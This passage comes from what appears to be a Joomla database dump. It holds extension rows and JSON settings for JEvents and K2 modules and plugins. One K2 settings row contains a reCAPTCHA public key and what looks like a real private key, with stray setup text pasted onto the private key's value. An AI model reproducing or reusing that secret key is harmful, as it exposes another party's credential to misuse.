"allowedit\":\"0\",\"icalformatted\":\"0\",\"com_rss_cache\":\"1\",\"com_rss_cache_time\":\"3600\",\"com_rss_count\":\"5\",\"com_rss_live_bookmarks\":\"1\",\"com_rss_modid\":\"0\",\"com_rss_title\":\"JEvents RSS Feed for Joomla\",\"com_rss_description\":\"Powered by JEvents!\",\"com_rss_limit_text\":\"0\",\"com_rss_text_length\":\"20\",\"com_rss_logo\":\"\",\"com_cache\":\"0\",\"newsef\":\"1\",\"nocatindetaillink\":\"0\",\"com_blockRobots\":\"1\",\"robotprior\":\"-1 month\",\"robotpost\":\"+1 month\",\"redirectrobots\":\"0\",\"robotmenuitem\":\"\",\"blockall\":\"0\",\"largeDataSetLimit\":\"100000\",\"module_config_from_component\":\"0\",\"modcal_DispLastMonth\":\"NO\",\"modcal_DispLastMonthDays\":\"0\",\"modcal_DispNextMonth\":\"NO\",\"modcal_DispNextMonthDays\":\"0\",\"modcal_LinkCloaking\":\"0\",\"modlatest_MaxEvents\":\"10\",\"modlatest_Mode\":\"0\",\"modlatest_Days\":\"5\",\"startnow\":\"0\",\"modlatest_NoRepeat\":\"1\",\"modlatest_DispYear\":\"0\",\"modlatest_multiday\":\"0\",\"modlatest_DispLinks\":\"1\",\"modlatest_DisDateStyle\":\"0\",\"modlatest_DisTitleStyle\":\"0\",\"modlatest_LinkToCal\":\"0\",\"modlatest_SortReverse\":\"0\",\"modlatest_LinkCloaking\":\"0\",\"modlatest_CustFmtStr\":\"${eventDate}[!a: - ${endDate(%I:%M%p)}]<br\\/>${title}\",\"modlatest_RSS\":\"0\",\"modlatest_contentplugins\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10230, 0, 'MOD_JEV_LATEST_EVENTS_TITLE', 'module', 'mod_jevents_latest', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_LATEST_EVENTS_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_LATEST_EVENTS_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_latest\"}', '{\"@spacer\":\"\",\"com_calViewName\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"catidnew\":\"\",\"extras0\":\"\",\"extras1\":\"\",\"extras2\":\"\",\"extras3\":\"\",\"extras4\":\"\",\"extras5\":\"\",\"extras6\":\"\",\"extras7\":\"\",\"extras8\":\"\",\"extras9\":\"\",\"extras10\":\"\",\"extras11\":\"\",\"extras12\":\"\",\"extras13\":\"\",\"ignorecatfilter\":\"0\",\"ignorefiltermodule\":\"0\",\"target_itemid\":\"\",\"modlatest_inccss\":\"1\",\"layout\":\"\",\"modlatest_useLocalParam\":\"1\",\"modlatest_CustFmtStr\":\"${eventDate}[!a: - ${endDate(%I:%M%p)}]<br \\/>${title}\",\"modlatest_MaxEvents\":\"10\",\"modlatest_Mode\":\"3\",\"modlatest_Days\":\"30\",\"startnow\":\"0\",\"pastonly\":\"0\",\"modlatest_NoRepeat\":\"0\",\"modlatest_multiday\":\"0\",\"modlatest_DispLinks\":\"1\",\"modlatest_DispYear\":\"0\",\"modlatest_DisDateStyle\":\"0\",\"modlatest_DisTitleStyle\":\"0\",\"modlatest_LinkToCal\":\"0\",\"modlatest_LinkCloaking\":\"0\",\"modlatest_SortReverse\":\"0\",\"modlatest_RSS\":\"0\",\"modlatest_rss_title\":\"\",\"modlatest_rss_description\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10270, 0, 'MOD_JEV_LEGEND_TITLE', 'module', 'mod_jevents_legend', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_LEGEND_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_LEGEND_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_legend\"}', '{\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"show_admin\":\"0\",\"modlegend_inccss\":\"1\",\"nonjeventsdisable\":\"1\",\"target_itemid\":\"\",\"catidnew\":\"\",\"hideinactivekids\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10271, 0, 'MOD_JEV_FILTER_MODULE_TITLE', 'module', 'mod_jevents_filter', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_FILTER_MODULE_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_FILTER_MODULE_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_filter\"}', '{\"filters\":\"search\",\"target_itemid\":\"\",\"cache\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10272, 0, 'MOD_JEV_SWITCH_VIEW_TITLE', 'module', 'mod_jevents_switchview', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_SWITCH_VIEW_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2009-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_SWITCH_VIEW_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_switchview\"}', '{\"cache\":\"0\",\"show_preview\":\"0\",\"target_itemid\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10273, 0, 'PLG_FINDER_JEVENTS', 'plugin', 'jevents', 'finder', 0, 1, 1, 0, '{\"name\":\"PLG_FINDER_JEVENTS\",\"type\":\"plugin\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2010-2018 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"PLG_FINDER_JEVENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jevents\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10274, 0, 'PLG_JEV_SEARCH_TITLE', 'plugin', 'eventsearch', 'search', 0, 1, 1, 0, '{\"name\":\"PLG_JEV_SEARCH_TITLE\",\"type\":\"plugin\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2008-2018 GWE Systems Ltd, 2006-2008 JEvents Project Group\",\"authorEmail\":\"\",\"authorUrl\":\"www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"PLG_JEV_SEARCH_DESC\",\"group\":\"\",\"filename\":\"eventsearch\"}', '{\"search_limit\":\"50\",\"date_format\":\"%Y-%m-%d\",\"target_itemid\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10275, 0, 'JEV_PACKAGE_TITLE', 'package', 'pkg_jevents', '', 0, 1, 1, 0, '{\"name\":\"JEV_PACKAGE_TITLE\",\"type\":\"package\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2012-2018 GWE Systems Ltd\",\"authorEmail\":\"\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"JEV_PACKAGE_DESC\",\"group\":\"\",\"filename\":\"pkg_jevents\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10279, 0, 'COM_K2', 'component', 'com_k2', '', 1, 1, 0, 0, '{\"name\":\"COM_K2\",\"type\":\"component\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"Thank you for installing K2 by JoomlaWorks, the powerful content extension for Joomla\",\"group\":\"\",\"filename\":\"k2\"}', '{\"enable_css\":\"0\",\"jQueryHandling\":\"0\",\"userName\":\"0\",\"userImage\":\"0\",\"userDescription\":\"0\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeedLink\":\"0\",\"userFeedIcon\":\"1\",\"userItemCount\":\"10\",\"userItemTitle\":\"1\",\"userItemTitleLinked\":\"1\",\"userItemDateCreated\":\"1\",\"userItemImage\":\"1\",\"userItemIntroText\":\"1\",\"userItemCategory\":\"0\",\"userItemTags\":\"1\",\"userItemCommentsAnchor\":\"1\",\"userItemReadMore\":\"1\",\"userItemK2Plugins\":\"1\",\"tagItemCount\":\"10\",\"tagItemTitle\":\"1\",\"tagItemTitleLinked\":\"1\",\"tagItemDateCreated\":\"1\",\"tagItemImage\":\"1\",\"tagItemIntroText\":\"1\",\"tagItemCategory\":\"1\",\"tagItemReadMore\":\"1\",\"tagItemExtraFields\":\"0\",\"tagOrdering\":\"alpha\",\"tagFeedLink\":\"1\",\"tagFeedIcon\":\"1\",\"genericItemCount\":\"10\",\"genericItemTitle\":\"1\",\"genericItemTitleLinked\":\"1\",\"genericItemDateCreated\":\"1\",\"genericItemImage\":\"1\",\"genericItemIntroText\":\"1\",\"genericItemCategory\":\"1\",\"genericItemReadMore\":\"1\",\"genericItemExtraFields\":\"0\",\"genericFeedLink\":\"1\",\"genericFeedIcon\":\"1\",\"feedLimit\":\"10\",\"feedItemImage\":\"0\",\"feedImgSize\":\"S\",\"feedItemIntroText\":\"1\",\"feedTextWordLimit\":\"\",\"feedItemFullText\":\"1\",\"feedItemTags\":\"0\",\"feedItemVideo\":\"0\",\"feedItemGallery\":\"0\",\"feedItemAttachments\":\"0\",\"feedBogusEmail\":\"\",\"introTextCleanup\":\"0\",\"introTextCleanupExcludeTags\":\"\",\"introTextCleanupTagAttr\":\"\",\"fullTextCleanup\":\"0\",\"fullTextCleanupExcludeTags\":\"\",\"fullTextCleanupTagAttr\":\"\",\"xssFiltering\":\"0\",\"linkPopupWidth\":\"900\",\"linkPopupHeight\":\"600\",\"imagesQuality\":\"100\",\"itemImageXS\":\"64\",\"itemImageS\":\"200\",\"itemImageM\":\"856\",\"itemImageL\":\"856\",\"itemImageXL\":\"856\",\"itemImageGeneric\":\"856\",\"catImageWidth\":\"100\",\"catImageDefault\":\"0\",\"userImageWidth\":\"64\",\"userImageDefault\":\"1\",\"commenterImgWidth\":\"48\",\"onlineImageEditor\":\"picozu\",\"imageTimestamp\":\"0\",\"imageMemoryLimit\":\"\",\"socialButtonCode\":\"\",\"twitterUsername\":\"\",\"facebookMetatags\":\"1\",\"facebookImage\":\"XSmall\",\"comments\":\"2\",\"commentsOrdering\":\"DESC\",\"commentsLimit\":\"10\",\"commentsFormPosition\":\"below\",\"commentsPublishing\":\"1\",\"commentsReporting\":\"2\",\"commentsReportRecipient\":\"\",\"inlineCommentsModeration\":\"0\",\"gravatar\":\"1\",\"antispam\":\"recaptcha\",\"recaptchaForRegistered\":\"1\",\"akismetForRegistered\":\"0\",\"commentsFormNotes\":\"1\",\"commentsFormNotesText\":\"\",\"frontendEditing\":\"1\",\"showImageTab\":\"1\",\"showImageGalleryTab\":\"1\",\"showVideoTab\":\"1\",\"showExtraFieldsTab\":\"1\",\"showAttachmentsTab\":\"1\",\"showK2Plugins\":\"1\",\"mergeEditors\":\"1\",\"backendListToggler\":\"TogglerStandard\",\"attachmentsFolder\":\"\",\"hideImportButton\":\"0\",\"K2UserProfile\":\"0\",\"K2UserGroup\":\"1\",\"redirect\":\"108\",\"adminSearch\":\"simple\",\"cookieDomain\":\"\",\"gatherStatistics\":\"1\",\"taggingSystem\":\"1\",\"lockTags\":\"0\",\"showTagFilter\":\"0\",\"k2TagNorm\":\"0\",\"k2TagNormCase\":\"lower\",\"k2TagNormAdditionalReplacements\":\"\",\"recaptcha_public_key\":\"6LfxihkUAAAAAMcTDfS3KtChwGVXyjZicJ6fWUQM\",\"recaptcha_private_key\":\"6LfxihkUAAAAAGjsoO9U7_a2Li5X6JRPHJksUmEU Step 1: client-side integration\",\"recaptcha_theme\":\"clean\",\"recaptchaV2\":\"1\",\"recaptchaOnRegistration\":\"1\",\"akismetApiKey\":\"\",\"stopForumSpam\":\"0\",\"stopForumSpamApiKey\":\"\",\"profilePageDisplay\":\"0\",\"showItemsCounterAdmin\":\"1\",\"showChildCatItems\":\"1\",\"disableCompactOrdering\":\"0\",\"metaDescLimit\":\"150\",\"enforceSEFReplacements\":\"0\",\"SEFReplacements\":\"\\u00c0|A, \\u00c1|A, \\u00c2|A, \\u00c3|A, \\u00c4|A, \\u00c5|A, \\u00e0|a, \\u00e1|a, \\u00e2|a, \\u00e3|a, \\u00e4|a, \\u00e5|a, \\u0100|A, \\u0101|a, \\u0102|A, \\u0103|a, \\u0104|A, \\u0105|a, \\u00c7|C, \\u00e7|c, \\u0106|C, \\u0107|c, \\u0108|C, \\u0109|c, \\u010a|C, \\u010b|c, \\u010c|C, \\u010d|c, \\u00d0|D, \\u00f0|d, \\u010e|D, \\u010f|d, \\u0110|D, \\u0111|d, \\u00c8|E, \\u00c9|E, \\u00ca|E, \\u00cb|E, \\u00e8|e, \\u00e9|e, \\u00ea|e, \\u00eb|e, \\u0112|E, \\u0113|e, \\u0114|E, \\u0115|e, \\u0116|E, \\u0117|e, \\u0118|E, \\u0119|e, \\u011a|E, \\u011b|e, \\u011c|G, \\u011d|g, \\u011e|G, \\u011f|g, \\u0120|G, \\u0121|g, \\u0122|G, \\u0123|g, \\u0124|H, \\u0125|h, \\u0126|H, \\u0127|h, \\u00cc|I, \\u00cd|I, \\u00ce|I, \\u00cf|I, \\u00ec|i, \\u00ed|i, \\u00ee|i, \\u00ef|i, \\u0128|I, \\u0129|i, \\u012a|I, \\u012b|i, \\u012c|I, \\u012d|i, \\u012e|I, \\u012f|i, \\u0130|I, \\u0131|i, \\u0134|J, \\u0135|j, \\u0136|K, \\u0137|k, \\u0138|k, \\u0139|L, \\u013a|l, \\u013b|L, \\u013c|l, \\u013d|L, \\u013e|l, \\u013f|L, \\u0140|l, \\u0141|L, \\u0142|l, \\u00d1|N, \\u00f1|n, \\u0143|N, \\u0144|n, \\u0145|N, \\u0146|n, \\u0147|N, \\u0148|n, \\u0149|n, \\u014a|N, \\u014b|n, \\u00d2|O, \\u00d3|O, \\u00d4|O, \\u00d5|O, \\u00d6|O, \\u00d8|O, \\u00f2|o, \\u00f3|o, \\u00f4|o, \\u00f5|o, \\u00f6|o, \\u00f8|o, \\u014c|O, \\u014d|o, \\u014e|O, \\u014f|o, \\u0150|O, \\u0151|o, \\u0154|R, \\u0155|r, \\u0156|R, \\u0157|r, \\u0158|R, \\u0159|r, \\u015a|S, \\u015b|s, \\u015c|S, \\u015d|s, \\u015e|S, \\u015f|s, \\u0160|S, \\u0161|s, \\u017f|s, \\u0162|T, \\u0163|t, \\u0164|T, \\u0165|t, \\u0166|T, \\u0167|t, \\u00d9|U, \\u00da|U, \\u00db|U, \\u00dc|U, \\u00f9|u, \\u00fa|u, \\u00fb|u, \\u00fc|u, \\u0168|U, \\u0169|u, \\u016a|U, \\u016b|u, \\u016c|U, \\u016d|u, \\u016e|U, \\u016f|u, \\u0170|U, \\u0171|u, \\u0172|U, \\u0173|u, \\u0174|W, \\u0175|w, \\u00dd|Y, \\u00fd|y, \\u00ff|y, \\u0176|Y, \\u0177|y, \\u0178|Y, \\u0179|Z, \\u017a|z, \\u017b|Z, \\u017c|z, \\u017d|Z, \\u017e|z, \\u03b1|a, \\u03b2|b, \\u03b3|g, \\u03b4|d, \\u03b5|e, \\u03b6|z, \\u03b7|h, \\u03b8|th, \\u03b9|i, \\u03ba|k, \\u03bb|l, \\u03bc|m, \\u03bd|n, \\u03be|x, \\u03bf|o, \\u03c0|p, \\u03c1|r, \\u03c3|s, \\u03c4|t, \\u03c5|y, \\u03c6|f, \\u03c7|ch, \\u03c8|ps, \\u03c9|w, \\u0391|A, \\u0392|B, \\u0393|G, \\u0394|D, \\u0395|E, \\u0396|Z, \\u0397|H, \\u0398|Th, \\u0399|I, \\u039a|K, \\u039b|L, \\u039c|M, \\u039e|X, \\u039f|O, \\u03a0|P, \\u03a1|R, \\u03a3|S, \\u03a4|T, \\u03a5|Y, \\u03a6|F, \\u03a7|Ch, \\u03a8|Ps, \\u03a9|W, \\u03ac|a, \\u03ad|e, \\u03ae|h, \\u03af|i, \\u03cc|o, \\u03cd|y, \\u03ce|w, \\u0386|A, \\u0388|E, \\u0389|H, \\u038a|I, \\u038c|O, \\u038e|Y, \\u038f|W, \\u03ca|i, \\u0390|i, \\u03cb|y, \\u03c2|s, \\u0410|A, \\u04d0|A, \\u04d2|A, \\u04d8|E, \\u04da|E, \\u04d4|E, \\u0411|B, \\u0412|V, \\u0413|G, \\u0490|G, \\u0403|G, \\u0492|G, \\u04f6|G, y|Y, \\u0414|D, \\u0415|E, \\u0400|E, \\u0401|YO, \\u04d6|E, \\u04bc|E, \\u04be|E, \\u0404|YE, \\u0416|ZH, \\u04c1|DZH, \\u0496|ZH, \\u04dc|DZH, \\u0417|Z, \\u0498|Z, \\u04de|DZ, \\u04e0|DZ, \\u0405|DZ, \\u0418|I, \\u040d|I, \\u04e4|I, \\u04e2|I, \\u0406|I, \\u0407|JI, \\u04c0|I, \\u0419|Y, \\u048a|Y, \\u0408|J, \\u041a|K, \\u049a|Q, \\u049e|Q, \\u04a0|K, \\u04c3|Q, \\u049c|K, \\u041b|L, \\u04c5|L, \\u0409|L, \\u041c|M, \\u04cd|M, \\u041d|N, \\u04c9|N, \\u04a2|N, \\u04c7|N, \\u04a4|N, \\u040a|N, \\u041e|O, \\u04e6|O, \\u04e8|O, \\u04ea|O, \\u04a8|O, \\u041f|P, \\u04a6|PF, \\u0420|P, \\u048e|P, \\u0421|S, \\u04aa|S, \\u0422|T, \\u04ac|TH, \\u040b|T, \\u040c|K, \\u0423|U, \\u040e|U, \\u04f2|U, \\u04f0|U, \\u04ee|U, \\u04ae|U, \\u04b0|U, \\u0424|F, \\u0425|H, \\u04b2|H, \\u04ba|H, \\u0426|TS, \\u04b4|TS, \\u0427|CH, \\u04f4|CH, \\u04b6|CH, \\u04cb|CH, \\u04b8|CH, \\u040f|DZ, \\u0428|SH, \\u0429|SHT, \\u042a|A, \\u042b|Y, \\u04f8|Y, \\u042c|Y, \\u048c|Y, \\u042d|E, \\u04ec|E, \\u042e|YU, \\u042f|YA, \\u0430|a, \\u04d1|a, \\u04d3|a, \\u04d9|e, \\u04db|e, \\u04d5|e, \\u0431|b, \\u0432|v, \\u0433|g, \\u0491|g, \\u0453|g, \\u0493|g, \\u04f7|g, y|y, \\u0434|d, \\u0435|e, \\u0450|e, \\u0451|yo, \\u04d7|e, \\u04bd|e, \\u04bf|e, \\u0454|ye, \\u0436|zh, \\u04c2|dzh, \\u0497|zh, \\u04dd|dzh, \\u0437|z, \\u0499|z, \\u04df|dz, \\u04e1|dz, \\u0455|dz, \\u0438|i, \\u045d|i, \\u04e5|i, \\u04e3|i, \\u0456|i, \\u0457|ji, \\u04c0|i, \\u0439|y, \\u048b|y, \\u0458|j, \\u043a|k, \\u049b|q, \\u049f|q, \\u04a1|k, \\u04c4|q, \\u049d|k, \\u043b|l, \\u04c6|l, \\u0459|l, \\u043c|m, \\u04ce|m, \\u043d|n, \\u04ca|n, \\u04a3|n, \\u04c8|n, \\u04a5|n, \\u045a|n, \\u043e|o, \\u04e7|o, \\u04e9|o, \\u04eb|o, \\u04a9|o, \\u043f|p, \\u04a7|pf, \\u0440|p, \\u048f|p, \\u0441|s, \\u04ab|s, \\u0442|t, \\u04ad|th, \\u045b|t, \\u045c|k, \\u0443|u, \\u045e|u, \\u04f3|u, \\u04f1|u, \\u04ef|u, \\u04af|u, \\u04b1|u, \\u0444|f, \\u0445|h, \\u04b3|h, \\u04bb|h, \\u0446|ts, \\u04b5|ts, \\u0447|ch, \\u04f5|ch, \\u04b7|ch, \\u04cc|ch, \\u04b9|ch, \\u045f|dz, \\u0448|sh, \\u0449|sht, \\u044a|a, \\u044b|y, \\u04f9|y, \\u044c|y, \\u048d|y, \\u044d|e, \\u04ed|e, \\u044e|yu, \\u044f|ya\",\"k2Sef\":\"0\",\"k2SefLabelCat\":\"content\",\"k2SefLabelTag\":\"tag\",\"k2SefLabelUser\":\"author\",\"k2SefLabelSearch\":\"search\",\"k2SefLabelDate\":\"date\",\"k2SefLabelItem\":\"0\",\"k2SefLabelItemCustomPrefix\":\"\",\"k2SefInsertItemId\":\"1\",\"k2SefItemIdTitleAliasSep\":\"dash\",\"k2SefUseItemTitleAlias\":\"1\",\"k2SefInsertCatId\":\"1\",\"k2SefCatIdTitleAliasSep\":\"dash\",\"k2SefUseCatTitleAlias\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10280, 0, 'plg_finder_k2', 'plugin', 'k2', 'finder', 0, 1, 1, 0, '{\"name\":\"plg_finder_k2\",\"type\":\"plugin\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"PLG_FINDER_K2_DESCRIPTION\",\"group\":\"\",\"filename\":\"k2\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10281, 0, 'Search - K2', 'plugin', 'k2', 'search', 0, 1, 1, 0, '{\"name\":\"Search - K2\",\"type\":\"plugin\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_THIS_PLUGIN_EXTENDS_THE_DEFAULT_JOOMLA_SEARCH_FUNCTIONALITY_TO_K2_CONTENT\",\"group\":\"\",\"filename\":\"k2\"}', '{\"search_limit\":\"50\",\"search_tags\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10282, 0, 'System - K2', 'plugin', 'k2', 'system', 0, 1, 1, 0, '{\"name\":\"System - K2\",\"type\":\"plugin\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_THE_K2_SYSTEM_PLUGIN_IS_USED_TO_ASSIST_THE_PROPER_FUNCTIONALITY_OF_THE_K2_COMPONENT_SITE_WIDE_MAKE_SURE_ITS_ALWAYS_PUBLISHED_WHEN_THE_K2_COMPONENT_IS_INSTALLED\",\"group\":\"\",\"filename\":\"k2\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10283, 0, 'User - K2', 'plugin', 'k2', 'user', 0, 1, 1, 0, '{\"name\":\"User - K2\",\"type\":\"plugin\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_A_USER_SYNCHRONIZATION_PLUGIN_FOR_K2\",\"group\":\"\",\"filename\":\"k2\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10284, 0, 'Josetta - K2 Categories', 'plugin', 'k2category', 'josetta_ext', 0, 1, 1, 0, '{\"name\":\"Josetta - K2 Categories\",\"type\":\"plugin\",\"creationDate\":\"December 8th, 2014\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.9\",\"description\":\"\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10285, 0, 'Josetta - K2 Items', 'plugin', 'k2item', 'josetta_ext', 0, 1, 1, 0, '{\"name\":\"Josetta - K2 Items\",\"type\":\"plugin\",\"creationDate\":\"June 7th, 2012\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.9\",\"description\":\"\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10286, 0, 'K2 Comments', 'module', 'mod_k2_comments', '', 0, 1, 0, 0, '{\"name\":\"K2 Comments\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"MOD_K2_COMMENTS_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_k2_comments.j25\"}', '{\"moduleclass_sfx\":\"\",\"module_usage\":\"\",\"\":\"K2_TOP_COMMENTERS\",\"catfilter\":\"0\",\"category_id\":\"\",\"comments_limit\":\"5\",\"comments_word_limit\":\"10\",\"commenterName\":\"1\",\"commentAvatar\":\"1\",\"commentAvatarWidthSelect\":\"custom\",\"commentAvatarWidth\":\"50\",\"commentDate\":\"1\",\"commentDateFormat\":\"absolute\",\"commentLink\":\"1\",\"itemTitle\":\"1\",\"itemCategory\":\"1\",\"feed\":\"1\",\"commenters_limit\":\"5\",\"commenterNameOrUsername\":\"1\",\"commenterAvatar\":\"1\",\"commenterAvatarWidthSelect\":\"custom\",\"commenterAvatarWidth\":\"50\",\"commenterLink\":\"1\",\"commenterCommentsCounter\":\"1\",\"commenterLatestComment\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10287, 0, 'K2 Content', 'module', 'mod_k2_content', '', 0, 1, 0, 0, '{\"name\":\"K2 Content\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_MOD_K2_CONTENT_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_k2_content.j25\"}', '{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Default\",\"source\":\"filter\",\"\":\"K2_OTHER_OPTIONS\",\"catfilter\":\"0\",\"category_id\":\"\",\"getChildren\":\"0\",\"itemCount\":\"5\",\"itemsOrdering\":\"\",\"FeaturedItems\":\"1\",\"popularityRange\":\"\",\"videosOnly\":\"0\",\"item\":\"\",\"items\":\"\",\"itemTitle\":\"1\",\"itemAuthor\":\"1\",\"itemAuthorAvatar\":\"1\",\"itemAuthorAvatarWidthSelect\":\"custom\",\"itemAuthorAvatarWidth\":\"50\",\"userDescription\":\"1\",\"itemIntroText\":\"1\",\"itemIntroTextWordLimit\":\"\",\"itemImage\":\"1\",\"itemImgSize\":\"Small\",\"itemVideo\":\"1\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemAttachments\":\"1\",\"itemTags\":\"1\",\"itemCategory\":\"1\",\"itemDateCreated\":\"1\",\"itemHits\":\"1\",\"itemReadMore\":\"1\",\"itemExtraFields\":\"0\",\"itemCommentsCounter\":\"1\",\"feed\":\"1\",\"itemPreText\":\"\",\"itemCustomLink\":\"0\",\"itemCustomLinkTitle\":\"\",\"itemCustomLinkURL\":\"http:\\/\\/\",\"itemCustomLinkMenuItem\":\"\",\"K2Plugins\":\"1\",\"JPlugins\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10288, 0, 'K2 Tools', 'module', 'mod_k2_tools', '', 0, 1, 0, 0, '{\"name\":\"K2 Tools\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_TOOLS\",\"group\":\"\",\"filename\":\"mod_k2_tools.j25\"}', 